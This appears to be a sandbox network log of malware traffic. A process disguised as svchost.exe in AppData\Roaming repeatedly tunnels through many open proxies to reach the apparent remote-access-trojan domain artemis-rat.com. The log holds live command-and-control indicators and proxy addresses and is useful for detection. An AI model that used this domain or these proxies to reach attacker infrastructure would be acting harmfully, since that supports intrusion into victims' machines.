Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3307	192.168.2.5	55776	154.236.189.7	1976	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.236004114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.378102064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3308	192.168.2.5	60109	69.160.223.129	8181	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.239065886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3309	192.168.2.5	55700	103.156.249.30	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.246474028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3310	192.168.2.5	55902	167.172.96.213	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.252027035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.333471060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3311	192.168.2.5	55907	167.99.131.11	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.252193928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.333566904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3312	192.168.2.5	60524	223.112.53.2	1025	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.326972961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.373832941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.846421957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3313	192.168.2.5	55723	198.89.91.90	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.327414036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3314	192.168.2.5	60592	43.133.136.208	8800	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.329145908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3315	192.168.2.5	60632	104.20.34.100	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.330718994 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.487495899 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3316	192.168.2.5	60614	43.155.170.35	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.332226038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3317	192.168.2.5	58934	83.12.149.202	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.336441040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3318	192.168.2.5	60782	178.128.157.114	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.352504969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3319	192.168.2.5	60792	43.153.172.76	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.365653038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3320	192.168.2.5	60791	178.128.157.114	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.365772009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3321	192.168.2.5	60659	104.19.5.247	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.366722107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.521044016 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3322	192.168.2.5	60793	43.153.172.76	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.368100882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3323	192.168.2.5	60794	178.128.157.114	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.368432045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3324	192.168.2.5	60795	43.153.172.76	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.370893002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3325	192.168.2.5	60796	178.128.157.114	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.371723890 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3326	192.168.2.5	60797	43.153.172.76	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.372015953 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3327	192.168.2.5	60671	104.20.235.179	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.373075962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.530297041 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3328	192.168.2.5	60694	104.16.107.142	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.384982109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.543920994 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3329	192.168.2.5	60700	104.27.12.22	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.386257887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.543942928 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3330	192.168.2.5	60107	197.242.146.109	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.389921904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.333405972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.833746910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3331	192.168.2.5	60704	172.67.182.90	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.389925003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.547389984 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3332	192.168.2.5	60737	104.20.75.69	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.421868086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.576193094 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3333	192.168.2.5	60743	172.67.127.188	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.436256886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.591777086 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3334	192.168.2.5	60643	72.206.181.97	64943	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.437062025 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3335	192.168.2.5	60620	164.92.237.188	52306	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.437077045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.146033049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.146564007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3336	192.168.2.5	55965	92.205.110.47	14936	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.451492071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3337	192.168.2.5	55888	197.243.20.187	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.460863113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.645610094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3338	192.168.2.5	60715	38.54.6.39	9080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.460865021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.680228949 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3339	192.168.2.5	55850	103.42.57.13	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.620210886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
